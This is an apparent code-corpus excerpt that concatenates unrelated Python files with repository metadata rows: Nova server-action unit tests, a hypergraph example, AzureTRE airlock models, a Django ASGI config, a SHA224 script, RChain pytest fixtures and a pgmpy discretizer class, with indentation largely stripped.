self.assertEqual(self.resize_called, call_no + 1)
@mock.patch('nova.compute.api.API.resize',
side_effect=exception.CannotResizeDisk(reason=''))
def test_resize_raises_cannot_resize_disk(self, mock_resize):
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
@mock.patch('nova.compute.api.API.resize',
side_effect=exception.FlavorNotFound(reason='',
flavor_id='fake_id'))
def test_resize_raises_flavor_not_found(self, mock_resize):
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_resize_with_too_many_instances(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
def fake_resize(*args, **kwargs):
raise exception.TooManyInstances(message="TooManyInstance")
self.stub_out('nova.compute.api.API.resize', fake_resize)
self.assertRaises(webob.exc.HTTPForbidden,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_resize_raises_conflict_on_invalid_state(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
def fake_resize(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stub_out('nova.compute.api.API.resize', fake_resize)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
@mock.patch.object(compute_api.API, 'resize')
def test_resize_instance_raise_auto_disk_config_exc(self, mock_resize):
mock_resize.side_effect = exception.AutoDiskConfigDisabledByImage(
image='dummy')
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
@mock.patch('nova.compute.api.API.resize',
side_effect=exception.PciRequestAliasNotDefined(
alias='fake_name'))
def test_resize_pci_alias_not_defined(self, mock_resize):
# Tests that PciRequestAliasNotDefined is translated to a 400 error.
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
def test_confirm_resize_server(self):
body = dict(confirmResize=None)
self.confirm_resize_called = False
def cr_mock(*args):
self.confirm_resize_called = True
self.stub_out('nova.compute.api.API.confirm_resize', cr_mock)
self.controller._action_confirm_resize(self.req, FAKE_UUID, body=body)
self.assertTrue(self.confirm_resize_called)
def test_confirm_resize_migration_not_found(self):
body = dict(confirmResize=None)
def confirm_resize_mock(*args):
raise exception.MigrationNotFoundByStatus(instance_id=1,
status='finished')
self.stub_out('nova.compute.api.API.confirm_resize',
confirm_resize_mock)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_confirm_resize,
self.req, FAKE_UUID, body=body)
def test_confirm_resize_raises_conflict_on_invalid_state(self):
body = dict(confirmResize=None)
def fake_confirm_resize(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stub_out('nova.compute.api.API.confirm_resize',
fake_confirm_resize)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_confirm_resize,
self.req, FAKE_UUID, body=body)
def test_revert_resize_migration_not_found(self):
body = dict(revertResize=None)
def revert_resize_mock(*args):
raise exception.MigrationNotFoundByStatus(instance_id=1,
status='finished')
self.stub_out('nova.compute.api.API.revert_resize',
revert_resize_mock)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_revert_resize,
self.req, FAKE_UUID, body=body)
def test_revert_resize_server_not_found(self):
body = dict(revertResize=None)
with mock.patch('nova.compute.api.API.get',
side_effect=exception.InstanceNotFound(
instance_id='bad_server_id')):
            self.assertRaises(webob.exc.HTTPNotFound,
self.controller._action_revert_resize,
self.req, "bad_server_id", body=body)
def test_revert_resize_server(self):
body = dict(revertResize=None)
self.revert_resize_called = False
def revert_mock(*args):
self.revert_resize_called = True
self.stub_out('nova.compute.api.API.revert_resize', revert_mock)
body = self.controller._action_revert_resize(self.req, FAKE_UUID,
body=body)
self.assertTrue(self.revert_resize_called)
def test_revert_resize_raises_conflict_on_invalid_state(self):
body = dict(revertResize=None)
def fake_revert_resize(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stub_out('nova.compute.api.API.revert_resize',
fake_revert_resize)
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_revert_resize,
self.req, FAKE_UUID, body=body)
def test_create_image(self):
body = {
'createImage': {
'name': 'Snapshot 1',
},
}
response = self.controller._action_create_image(self.req, FAKE_UUID,
body=body)
location = response.headers['Location']
self.assertEqual(self.image_url + '123' if self.image_url else
self.image_api.generate_image_url('123', self.context),
location)
def test_create_image_v2_45(self):
"""Tests the createImage server action API with the 2.45 microversion
where there is a response body but no Location header.
"""
body = {
'createImage': {
'name': 'Snapshot 1',
},
}
req = fakes.HTTPRequest.blank('', version='2.45')
response = self.controller._action_create_image(req, FAKE_UUID,
body=body)
self.assertIsInstance(response, dict)
self.assertEqual('123', response['image_id'])
def test_create_image_name_too_long(self):
long_name = 'a' * 260
body = {
'createImage': {
'name': long_name,
},
}
self.assertRaises(self.validation_error,
self.controller._action_create_image, self.req,
FAKE_UUID, body=body)
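    # Helper for the volume-backed snapshot flow: block device mappings and
    # the instance's image system metadata are stubbed, quiescing is made to
    # report "unsupported", and the volume snapshot is forced; the test then
    # inspects the resulting image properties and its bdm_v2 mapping.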
def _do_test_create_volume_backed_image(
self, extra_properties, mock_vol_create_side_effect=None):
def _fake_id(x):
return '%s-%s-%s-%s' % (x * 8, x * 4, x * 4, x * 12)
body = dict(createImage=dict(name='snapshot_of_volume_backed'))
if extra_properties:
body['createImage']['metadata'] = extra_properties
image_service = glance.get_default_image_service()
bdm = [dict(volume_id=_fake_id('a'),
volume_size=1,
device_name='vda',
delete_on_termination=False)]
def fake_block_device_mapping_get_all_by_instance(context, inst_id,
use_slave=False):
return [fake_block_device.FakeDbBlockDeviceDict(
{'volume_id': _fake_id('a'),
'source_type': 'snapshot',
'destination_type': 'volume',
'volume_size': 1,
'device_name': 'vda',
'snapshot_id': 1,
'boot_index': 0,
'delete_on_termination': False,
'no_device': None})]
self.stub_out('nova.db.api.block_device_mapping_get_all_by_instance',
fake_block_device_mapping_get_all_by_instance)
system_metadata = dict(image_kernel_id=_fake_id('b'),
image_ramdisk_id=_fake_id('c'),
image_root_device_name='/dev/vda',
image_block_device_mapping=str(bdm),
image_container_format='ami')
instance = fakes.fake_compute_get(project_id=fakes.FAKE_PROJECT_ID,
image_ref=uuids.fake,
vm_state=vm_states.ACTIVE,
root_device_name='/dev/vda',
system_metadata=system_metadata)
self.stub_out('nova.compute.api.API.get', instance)
volume = dict(id=_fake_id('a'),
size=1,
host='fake',
display_description='fake')
snapshot = dict(id=_fake_id('d'))
with test.nested(
mock.patch.object(
self.controller.compute_api.volume_api, 'get_absolute_limits',
return_value={'totalSnapshotsUsed': 0,
'maxTotalSnapshots': 10}),
mock.patch.object(self.controller.compute_api.compute_rpcapi,
'quiesce_instance',
side_effect=exception.InstanceQuiesceNotSupported(
instance_id='fake', reason='test')),
mock.patch.object(self.controller.compute_api.volume_api, 'get',
return_value=volume),
mock.patch.object(self.controller.compute_api.volume_api,
'create_snapshot_force',
return_value=snapshot),
) as (mock_get_limits, mock_quiesce, mock_vol_get, mock_vol_create):
if mock_vol_create_side_effect:
mock_vol_create.side_effect = mock_vol_create_side_effect
response = self.controller._action_create_image(self.req,
FAKE_UUID, body=body)
location = response.headers['Location']
image_id = location.replace(self.image_url or
self.image_api.generate_image_url('', self.context),
'')
image = image_service.show(None, image_id)
self.assertEqual(image['name'], 'snapshot_of_volume_backed')
properties = image['properties']
self.assertEqual(properties['kernel_id'], _fake_id('b'))
self.assertEqual(properties['ramdisk_id'], _fake_id('c'))
self.assertEqual(properties['root_device_name'], '/dev/vda')
self.assertTrue(properties['bdm_v2'])
bdms = properties['block_device_mapping']
self.assertEqual(len(bdms), 1)
self.assertEqual(bdms[0]['boot_index'], 0)
self.assertEqual(bdms[0]['source_type'], 'snapshot')
self.assertEqual(bdms[0]['destination_type'], 'volume')
self.assertEqual(bdms[0]['snapshot_id'], snapshot['id'])
self.assertEqual('/dev/vda', bdms[0]['device_name'])
for fld in ('connection_info', 'id', 'instance_uuid'):
self.assertNotIn(fld, bdms[0])
for k in extra_properties.keys():
self.assertEqual(properties[k], extra_properties[k])
mock_quiesce.assert_called_once_with(mock.ANY, mock.ANY)
mock_vol_get.assert_called_once_with(mock.ANY, volume['id'])
mock_vol_create.assert_called_once_with(mock.ANY, volume['id'],
mock.ANY, mock.ANY)
def test_create_volume_backed_image_no_metadata(self):
self._do_test_create_volume_backed_image({})
def test_create_volume_backed_image_with_metadata(self):
self._do_test_create_volume_backed_image(dict(ImageType='Gold',
ImageVersion='2.0'))
def test_create_volume_backed_image_cinder_over_quota(self):
self.assertRaises(
webob.exc.HTTPForbidden,
self._do_test_create_volume_backed_image, {},
mock_vol_create_side_effect=exception.OverQuota(
overs='snapshot'))
def _test_create_volume_backed_image_with_metadata_from_volume(
self, extra_metadata=None):
def _fake_id(x):
return '%s-%s-%s-%s' % (x * 8, x * 4, x * 4, x * 12)
body = dict(createImage=dict(name='snapshot_of_volume_backed'))
if extra_metadata:
body['createImage']['metadata'] = extra_metadata
image_service = glance.get_default_image_service()
def fake_block_device_mapping_get_all_by_instance(context, inst_id,
use_slave=False):
return [fake_block_device.FakeDbBlockDeviceDict(
{'volume_id': _fake_id('a'),
'source_type': 'snapshot',
'destination_type': 'volume',
'volume_size': 1,
'device_name': 'vda',
'snapshot_id': 1,
'boot_index': 0,
'delete_on_termination': False,
'no_device': None})]
self.stub_out('nova.db.api.block_device_mapping_get_all_by_instance',
fake_block_device_mapping_get_all_by_instance)
instance = fakes.fake_compute_get(
project_id=fakes.FAKE_PROJECT_ID,
image_ref='',
vm_state=vm_states.ACTIVE,
root_device_name='/dev/vda',
system_metadata={'image_test_key1': 'test_value1',
'image_test_key2': 'test_value2'})
self.stub_out('nova.compute.api.API.get', instance)
volume = dict(id=_fake_id('a'),
size=1,
host='fake',
display_description='fake')
snapshot = dict(id=_fake_id('d'))
with test.nested(
mock.patch.object(
self.controller.compute_api.volume_api, 'get_absolute_limits',
return_value={'totalSnapshotsUsed': 0,
'maxTotalSnapshots': 10}),
mock.patch.object(self.controller.compute_api.compute_rpcapi,
'quiesce_instance',
side_effect=exception.InstanceQuiesceNotSupported(
instance_id='fake', reason='test')),
mock.patch.object(self.controller.compute_api.volume_api, 'get',
return_value=volume),
mock.patch.object(self.controller.compute_api.volume_api,
'create_snapshot_force',
return_value=snapshot),
) as (mock_get_limits, mock_quiesce, mock_vol_get, mock_vol_create):
response = self.controller._action_create_image(self.req,
FAKE_UUID, body=body)
location = response.headers['Location']
image_id = location.replace(self.image_base_url, '')
image = image_service.show(None, image_id)
properties = image['properties']
self.assertEqual(properties['test_key1'], 'test_value1')
self.assertEqual(properties['test_key2'], 'test_value2')
if extra_metadata:
for key, val in extra_metadata.items():
self.assertEqual(properties[key], val)
mock_quiesce.assert_called_once_with(mock.ANY, mock.ANY)
mock_vol_get.assert_called_once_with(mock.ANY, volume['id'])
mock_vol_create.assert_called_once_with(mock.ANY, volume['id'],
mock.ANY, mock.ANY)
def test_create_vol_backed_img_with_meta_from_vol_without_extra_meta(self):
self._test_create_volume_backed_image_with_metadata_from_volume()
def test_create_vol_backed_img_with_meta_from_vol_with_extra_meta(self):
self._test_create_volume_backed_image_with_metadata_from_volume(
extra_metadata={'a': 'b'})
def test_create_image_with_metadata(self):
body = {
'createImage': {
'name': 'Snapshot 1',
'metadata': {'key': 'asdf'},
},
}
response = self.controller._action_create_image(self.req, FAKE_UUID,
body=body)
location = response.headers['Location']
self.assertEqual(self.image_url + '123' if self.image_url else
self.image_api.generate_image_url('123', self.context), location)
def test_create_image_with_too_much_metadata(self):
body = {
'createImage': {
'name': 'Snapshot 1',
'metadata': {},
},
}
for num in range(CONF.quota.metadata_items + 1):
body['createImage']['metadata']['foo%i' % num] = "bar"
self.assertRaises(webob.exc.HTTPForbidden,
self.controller._action_create_image,
self.req, FAKE_UUID, body=body)
def test_create_image_no_name(self):
body = {
'createImage': {},
}
self.assertRaises(self.validation_error,
self.controller._action_create_image,
self.req, FAKE_UUID, body=body)
def test_create_image_blank_name(self):
body = {
'createImage': {
'name': '',
}
}
self.assertRaises(self.validation_error,
self.controller._action_create_image,
self.req, FAKE_UUID, body=body)
def test_create_image_bad_metadata(self):
body = {
'createImage': {
'name': 'geoff',
'metadata': 'henry',
},
}
self.assertRaises(self.validation_error,
self.controller._action_create_image,
self.req, FAKE_UUID, body=body)
def test_create_image_raises_conflict_on_invalid_state(self):
def snapshot(*args, **kwargs):
raise exception.InstanceInvalidState(attr='fake_attr',
state='fake_state', method='fake_method',
instance_uuid='fake')
self.stub_out('nova.compute.api.API.snapshot', snapshot)
body = {
"createImage": {
"name": "test_snapshot",
},
}
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_create_image,
self.req, FAKE_UUID, body=body)
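    # A compute service reporting an old version (38 in this test) cannot
    # handle servers whose ports carry resource requests, so the resize is
    # expected to be rejected with HTTP 409.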
@mock.patch('nova.objects.Service.get_by_host_and_binary')
@mock.patch('nova.api.openstack.common.'
'instance_has_port_with_resource_request', return_value=True)
def test_resize_with_bandwidth_from_old_compute_not_supported(
self, mock_has_res_req, mock_get_service):
body = dict(resize=dict(flavorRef="http://localhost/3"))
mock_get_service.return_value = objects.Service()
mock_get_service.return_value.version = 38
self.assertRaises(webob.exc.HTTPConflict,
self.controller._action_resize,
self.req, FAKE_UUID, body=body)
mock_has_res_req.assert_called_once_with(
FAKE_UUID, self.controller.network_api)
mock_get_service.assert_called_once_with(
self.req.environ['nova.context'], 'fake_host', 'nova-compute')
| 40.557222 | 79 | 0.574008 |
4a25a44859dc73e781db02056775a29fbafb5bc4 | 951 | py | Python | examples/basic/tweaks1.py | sflinter/hypergraph | c3108ee51361d2e4b8ddc7eced1953f1548ce8d8 | [
"Apache-2.0"
] | 1 | 2020-12-17T11:17:56.000Z | 2020-12-17T11:17:56.000Z | examples/basic/tweaks1.py | sflinter/hypergraph | c3108ee51361d2e4b8ddc7eced1953f1548ce8d8 | [
"Apache-2.0"
] | null | null | null | examples/basic/tweaks1.py | sflinter/hypergraph | c3108ee51361d2e4b8ddc7eced1953f1548ce8d8 | [
"Apache-2.0"
] | null | null | null |
import hypergraph as hg
from hypergraph.genetic import GeneticOperators
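# Demo script: build a hypergraph with tweakable (tunable) parameters,
# derive its genetic phenotype, evolve individuals (population, crossover,
# mutation), and finally run the graph using an individual as its tweaks.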
@hg.function()
# TODO @hg.decl_tweaks(z=hg.tweak(hg.LogUniform(), name='z'))
def test1(x, y):
return x+y
@hg.aggregator()
def mygraph1():
n1 = {'x': 2, 'y': hg.tweak(hg.LogUniform(), name="y1")}
n2 = {'x': 1, 'y': hg.tweak(hg.LogUniform(), name="y2")}
a = hg.call(test1) << (hg.switch(name="sw1") << [n1, n2])
return [a, hg.tweak(hg.QUniform(high=100)), hg.tweak(hg.LogUniform())]
graph1 = mygraph1()
# create a population from graph's phenotype
genetic = GeneticOperators(graph1)
print(genetic.phenotype)
population = genetic.create_population(3)
print(population[:2])
# crossover two parents to get a new individual
child = genetic.crossover_uniform_multi_parents(population[:2])
print(child)
# apply mutations to an individual
genetic.mutations(child, prob=0.5)
print(child)
# use an individual as graph's tweak
print(hg.run(graph1, tweaks=child))
| 26.416667 | 74 | 0.70347 |
4a25a45cc3eddc2a4d09df8d93216e165a277a4d | 1,457 | py | Python | api_app/models/domain/airlock_resource.py | chboudry/AzureTRE | 79011378f19ce0e1030b05937bfb0f5f685bfab9 | [
"MIT"
] | null | null | null | api_app/models/domain/airlock_resource.py | chboudry/AzureTRE | 79011378f19ce0e1030b05937bfb0f5f685bfab9 | [
"MIT"
] | null | null | null | api_app/models/domain/airlock_resource.py | chboudry/AzureTRE | 79011378f19ce0e1030b05937bfb0f5f685bfab9 | [
"MIT"
] | null | null | null |
from enum import Enum
from typing import List
from pydantic import Field
from models.domain.azuretremodel import AzureTREModel
from resources import strings
class AirlockRequestStatus(str, Enum):
"""
Airlock Request status
"""
Draft = strings.AIRLOCK_RESOURCE_STATUS_DRAFT
Submitted = strings.AIRLOCK_RESOURCE_STATUS_SUBMITTED
InReview = strings.AIRLOCK_RESOURCE_STATUS_INREVIEW
Approved = strings.AIRLOCK_RESOURCE_STATUS_APPROVED
Rejected = strings.AIRLOCK_RESOURCE_STATUS_REJECTED
Cancelled = strings.AIRLOCK_RESOURCE_STATUS_CANCELLED
Blocked = strings.AIRLOCK_RESOURCE_STATUS_BLOCKED
class AirlockResourceType(str, Enum):
"""
Type of resource to create
"""
AirlockRequest = strings.AIRLOCK_RESOURCE_TYPE_REQUEST
# TODO Airlock review type - https://github.com/microsoft/AzureTRE/issues/1840
class AirlockResourceHistoryItem(AzureTREModel):
"""
Resource History Item - to preserve history of resource properties
"""
resourceVersion: int
updatedWhen: float
user: dict = {}
previousStatus: AirlockRequestStatus
class AirlockResource(AzureTREModel):
"""
Resource request
"""
id: str = Field(title="Id", description="GUID identifying the resource")
resourceType: AirlockResourceType
resourceVersion: int = 0
user: dict = {}
updatedWhen: float = 0
history: List[AirlockResourceHistoryItem] = []
status: AirlockRequestStatus
| 29.14 | 82 | 0.750172 |
4a25a49d75df98ed5c35ebe0a8a6078050175f60 | 405 | py | Python | wolf_chat_proj/wolf_chat_proj/asgi.py | dharanish-v/wolf-chat | f3ef1a020e27ea8cf18b142bcb3f7b1c6121144d | [
"MIT"
] | null | null | null | wolf_chat_proj/wolf_chat_proj/asgi.py | dharanish-v/wolf-chat | f3ef1a020e27ea8cf18b142bcb3f7b1c6121144d | [
"MIT"
] | null | null | null | wolf_chat_proj/wolf_chat_proj/asgi.py | dharanish-v/wolf-chat | f3ef1a020e27ea8cf18b142bcb3f7b1c6121144d | [
"MIT"
] | null | null | null |
"""
ASGI config for wolf_chat_proj project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'wolf_chat_proj.settings')
application = get_asgi_application()
| 23.823529 | 78 | 0.792593 |
4a25a5a46cd9aefd861616a8c544d9b91f0f9c8c | 668 | py | Python | sha224.py | deadcodesoc/pycommoncrypto | 691cffbdd7817643d794bc618dd3ad7b4e5a78a8 | [
"MIT"
] | null | null | null | sha224.py | deadcodesoc/pycommoncrypto | 691cffbdd7817643d794bc618dd3ad7b4e5a78a8 | [
"MIT"
] | null | null | null | sha224.py | deadcodesoc/pycommoncrypto | 691cffbdd7817643d794bc618dd3ad7b4e5a78a8 | [
"MIT"
] | null | null | null |
#!/usr/bin/python
import sys
import _commoncrypto
digest2hex = lambda s: ''.join([hex(ord(x))[2:].zfill(2) for x in s])
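# Streaming digest: SHA224_Init/Update/Final follow the usual incremental
# hashing pattern, so input is hashed in bounded reads instead of being
# loaded into memory all at once.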
def sha224(handler):
ctx = _commoncrypto.SHA224_Init()
while True:
line = handler.readline(1024)
if len(line) == 0: break
_commoncrypto.SHA224_Update(ctx, line)
s = _commoncrypto.SHA224_Final(ctx)
return s
if __name__ == '__main__':
if sys.argv[1:]:
for arg in sys.argv[1:]:
f = open(arg)
            s = sha224(f)
print 'SHA224 (%s) = %s' % (arg, digest2hex(s))
f.close()
else:
f = sys.stdin
s = sha224(f)
print digest2hex(s)
| 23.857143 | 69 | 0.556886 |
4a25a5a7fd9910b4efb69d17ae49240a89a139a2 | 274 | py | Python | exe052a.py | Alexmachado81/ExerciciosPython_Resolvidos | 2774ba742788eb7b545f3f85e9438deb68a983d4 | [
"MIT"
] | null | null | null | exe052a.py | Alexmachado81/ExerciciosPython_Resolvidos | 2774ba742788eb7b545f3f85e9438deb68a983d4 | [
"MIT"
] | null | null | null | exe052a.py | Alexmachado81/ExerciciosPython_Resolvidos | 2774ba742788eb7b545f3f85e9438deb68a983d4 | [
"MIT"
] | null | null | null |
numero = int(input('Enter a number: '))
soma = 0
# count the divisors of numero; a prime number has exactly two
for c in range(1, numero + 1):
    if numero % c == 0:
        soma = soma + 1
if soma == 2:
    print('The given number {} is prime'.format(numero))
else:
    print('The given number {} is not prime'.format(numero))
| 30.444444 | 66 | 0.620438 |
4a25a5fca94695380432534c77527bebbaf79246 | 521 | py | Python | tests/test_multicore.py | umbibio/gbnet | 0e478d764cfa02eaed3e32d11d03c240c78e2ff6 | [
"MIT"
] | null | null | null | tests/test_multicore.py | umbibio/gbnet | 0e478d764cfa02eaed3e32d11d03c240c78e2ff6 | [
"MIT"
] | null | null | null | tests/test_multicore.py | umbibio/gbnet | 0e478d764cfa02eaed3e32d11d03c240c78e2ff6 | [
"MIT"
] | 1 | 2019-06-10T16:19:58.000Z | 2019-06-10T16:19:58.000Z |
import gbnet
import pandas as pd
import pickle
rp = gbnet.aux.Reporter()
rp.report("Init")
file_paths = [f"gbnet_{v}.csv" for v in ["ents", "rels", "evid"]]
dfs = [pd.read_csv(fp) for fp in file_paths]
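# Build the model from the three CSVs (entities, relations, evidence) and
# sample three chains with njobs=3, which presumably runs one chain per
# worker process.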
model = gbnet.models.ORNORModel(*dfs, nchains=3)
rp.report("Model loaded")
# rp.report("Init sampling single core")
# model.sample(N=500, thin=1, njobs=1)
# rp.report("done sampling single core")
rp.report("Init sampling multicore")
model.sample(N=500, thin=1, njobs=3)
rp.report("done sampling multicore")
| 24.809524 | 66 | 0.702495 |
4a25a628823d2f8010a135348842d1e5648a469a | 7,751 | py | Python | integration-tests/test/conftest.py | MicrohexHQ/rchain | a1b047479ac08f2f307f053960c102d81f9ee956 | [
"Apache-2.0"
] | null | null | null | integration-tests/test/conftest.py | MicrohexHQ/rchain | a1b047479ac08f2f307f053960c102d81f9ee956 | [
"Apache-2.0"
] | null | null | null | integration-tests/test/conftest.py | MicrohexHQ/rchain | a1b047479ac08f2f307f053960c102d81f9ee956 | [
"Apache-2.0"
] | null | null | null | import os
import time
from random import Random
import tempfile
import logging
import contextlib
from collections import defaultdict
from typing import (
Any,
List,
Generator,
Dict,
Optional,
)
import pytest
from _pytest.terminal import TerminalReporter
from _pytest.reports import TestReport
from _pytest.config.argparsing import Parser
import docker as docker_py
from docker.client import DockerClient
from rchain.crypto import PrivateKey
from .common import (
CommandLineOptions,
TestingContext,
)
from .rnode import (
Node,
docker_network_with_started_bootstrap,
)
from .pregenerated_keypairs import PREGENERATED_KEYPAIRS
# Silence unwanted noise in logs produced at the DEBUG level
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
logging.getLogger('connectionpool.py').setLevel(logging.WARNING)
logging.getLogger('docker.utils.config').setLevel(logging.WARNING)
logging.getLogger('docker.auth').setLevel(logging.WARNING)
def pytest_addoption(parser: Parser) -> None:
parser.addoption("--startup-timeout", type=int, action="store", default=60 * 30, help="timeout in seconds for starting a node")
parser.addoption("--converge-timeout", type=int, action="store", default=60 * 30, help="timeout in seconds for network converge")
parser.addoption("--receive-timeout", type=int, action="store", default=30, help="timeout in seconds for receiving a single block")
parser.addoption("--command-timeout", type=int, action="store", default=60 * 30, help="timeout in seconds for executing a rnode call")
parser.addoption("--mount-dir", action="store", default=None, help="globally accesible directory for mounting between containers")
parser.addoption("--random-seed", type=int, action="store", default=None, help="seed for the random numbers generator used in integration tests")
def pytest_terminal_summary(terminalreporter: TerminalReporter) -> None:
tr = terminalreporter
dlist: Dict[str, List[TestReport]] = defaultdict(list)
for replist in tr.stats.values():
for rep in replist:
if hasattr(rep, "duration"):
dlist[rep.nodeid].append(rep)
if not dlist:
return
tr.write_sep("=", "test durations")
for nodeid, reps in dlist.items():
total_second = sum([rep.duration for rep in reps])
detail_duration = ",".join(["{:<8} {:8.2f}s".format(rep.when, rep.duration) for rep in reps])
tr.write_line("Total: {:8.2f}s, {} {}".format(total_second, detail_duration, nodeid))
@pytest.yield_fixture(scope='session')
def command_line_options(request: Any) -> Generator[CommandLineOptions, None, None]:
startup_timeout = int(request.config.getoption("--startup-timeout"))
converge_timeout = int(request.config.getoption("--converge-timeout"))
receive_timeout = int(request.config.getoption("--receive-timeout"))
command_timeout = int(request.config.getoption("--command-timeout"))
mount_dir = request.config.getoption("--mount-dir")
random_seed = request.config.getoption("--random-seed")
command_line_options = CommandLineOptions(
node_startup_timeout=startup_timeout,
network_converge_timeout=converge_timeout,
receive_timeout=receive_timeout,
command_timeout=command_timeout,
mount_dir=mount_dir,
random_seed=random_seed,
)
yield command_line_options
@contextlib.contextmanager
def temporary_bonds_file(validator_bonds_dict: Dict[PrivateKey, int]) -> Generator[str, None, None]:
(fd, file) = tempfile.mkstemp(prefix="rchain-bonds-file-", suffix=".txt", dir="/tmp")
try:
with os.fdopen(fd, "w") as f:
for private_key, bond in validator_bonds_dict.items():
f.write("{} {}\n".format(private_key.get_public_key().to_hex(), bond))
yield file
finally:
os.unlink(file)
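# Each bonds-file line is "<validator public key hex> <bond amount>"; the
# wallets files written below use "<eth address>,<initial balance>,0".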
def make_wallets_file_lines(wallet_balance_from_private_key: Dict[PrivateKey, int]) -> List[str]:
result = []
for private_key, token_amount in wallet_balance_from_private_key.items():
line = '{},{},0'.format(private_key.get_public_key().get_eth_address(), token_amount)
result.append(line)
return result
def generate_random_wallet_map(random_generator: Random, wallets_amount:int = 5) -> Dict[PrivateKey, int]:
wallet_balance_from_private_key = {}
for _ in range(wallets_amount):
wallet_balance_from_private_key[PrivateKey.generate()] = random_generator.randint(10, 1000)
return wallet_balance_from_private_key
@contextlib.contextmanager
def temporary_wallets_file(random_generator: Random, wallet_balance_from_private_key: Optional[Dict[PrivateKey, int]]= None) -> Generator[str, None, None]:
if wallet_balance_from_private_key is None:
wallet_balance_from_private_key = generate_random_wallet_map(random_generator)
lines = make_wallets_file_lines(wallet_balance_from_private_key)
(fd, file) = tempfile.mkstemp(prefix="rchain-wallets-file-", suffix=".txt")
try:
with os.fdopen(fd, "w") as f:
f.writelines('{}\n'.format(l) for l in lines)
yield file
finally:
os.unlink(file)
@pytest.yield_fixture(scope='session')
def docker_client() -> Generator[DockerClient, None, None]:
docker_client = docker_py.from_env()
try:
yield docker_client
finally:
docker_client.volumes.prune()
docker_client.networks.prune()
@pytest.yield_fixture(scope='session')
def random_generator(command_line_options: CommandLineOptions) -> Generator[Random, None, None]:
random_seed = time.time() if command_line_options.random_seed is None else command_line_options.random_seed
logging.critical("Using tests random number generator seed: %d", random_seed)
random_generator = Random(random_seed)
yield random_generator
@contextlib.contextmanager
def testing_context(command_line_options: CommandLineOptions, random_generator: Random, docker_client: DockerClient, bootstrap_key: PrivateKey = None, peers_keys: List[PrivateKey] = None, network_peers: int = 2, validator_bonds_dict: Dict[PrivateKey, int] = None) -> Generator[TestingContext, None, None]:
if bootstrap_key is None:
bootstrap_key = PREGENERATED_KEYPAIRS[0]
if peers_keys is None:
peers_keys = PREGENERATED_KEYPAIRS[1:][:network_peers]
if validator_bonds_dict is None:
bonds_file_keys = [bootstrap_key] + peers_keys
validator_bonds_dict = dict()
for private_key in bonds_file_keys:
validator_bonds_dict[private_key] = random_generator.randint(1, 100)
with temporary_bonds_file(validator_bonds_dict) as bonds_file:
context = TestingContext(
bonds_file=bonds_file,
bootstrap_key=bootstrap_key,
peers_keys=peers_keys,
docker=docker_client,
node_startup_timeout=command_line_options.node_startup_timeout,
network_converge_timeout=command_line_options.network_converge_timeout,
receive_timeout=command_line_options.receive_timeout,
command_timeout=command_line_options.command_timeout,
mount_dir=command_line_options.mount_dir,
random_generator=random_generator,
)
yield context
testing_context.__test__ = False # type: ignore
@pytest.yield_fixture(scope='module')
def started_standalone_bootstrap_node(command_line_options: CommandLineOptions, random_generator: Random, docker_client: DockerClient) -> Generator[Node, None, None]:
with testing_context(command_line_options, random_generator, docker_client) as context:
with docker_network_with_started_bootstrap(context=context) as bootstrap_node:
yield bootstrap_node
| 41.897297 | 305 | 0.73268 |
4a25a6b189ea89f851e3c9c72a56301d37585d49 | 8,474 | py | Python | pgmpy/factors/continuous/discretize.py | vwxyzjn/pgmpy | 32421fcf0cd4be487871d86dddebeda6556cd292 | [
"MIT"
] | null | null | null | pgmpy/factors/continuous/discretize.py | vwxyzjn/pgmpy | 32421fcf0cd4be487871d86dddebeda6556cd292 | [
"MIT"
] | null | null | null | pgmpy/factors/continuous/discretize.py | vwxyzjn/pgmpy | 32421fcf0cd4be487871d86dddebeda6556cd292 | [
"MIT"
] | 1 | 2021-11-05T03:27:56.000Z | 2021-11-05T03:27:56.000Z |
from __future__ import division
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy import integrate
class BaseDiscretizer(metaclass=ABCMeta):
"""
Base class for the discretizer classes in pgmpy. The discretizer
classes are used to discretize a continuous random variable
distribution into discrete probability masses.
Parameters
----------
factor: A ContinuousNode or a ContinuousFactor object
the continuous node or factor representing the distribution
to be discretized.
low, high: float
the range over which the function will be discretized.
cardinality: int
the number of states required in the discretized output.
Examples
--------
>>> from scipy.stats import norm
>>> from pgmpy.factors.continuous import ContinuousNode
>>> normal = ContinuousNode(norm(0, 1).pdf)
>>> from pgmpy.discretize import BaseDiscretizer
>>> class ChildDiscretizer(BaseDiscretizer):
... def get_discrete_values(self):
... pass
>>> discretizer = ChildDiscretizer(normal, -3, 3, 10)
>>> discretizer.factor
<pgmpy.factors.continuous.ContinuousNode.ContinuousNode object at 0x04C98190>
>>> discretizer.cardinality
10
>>> discretizer.get_labels()
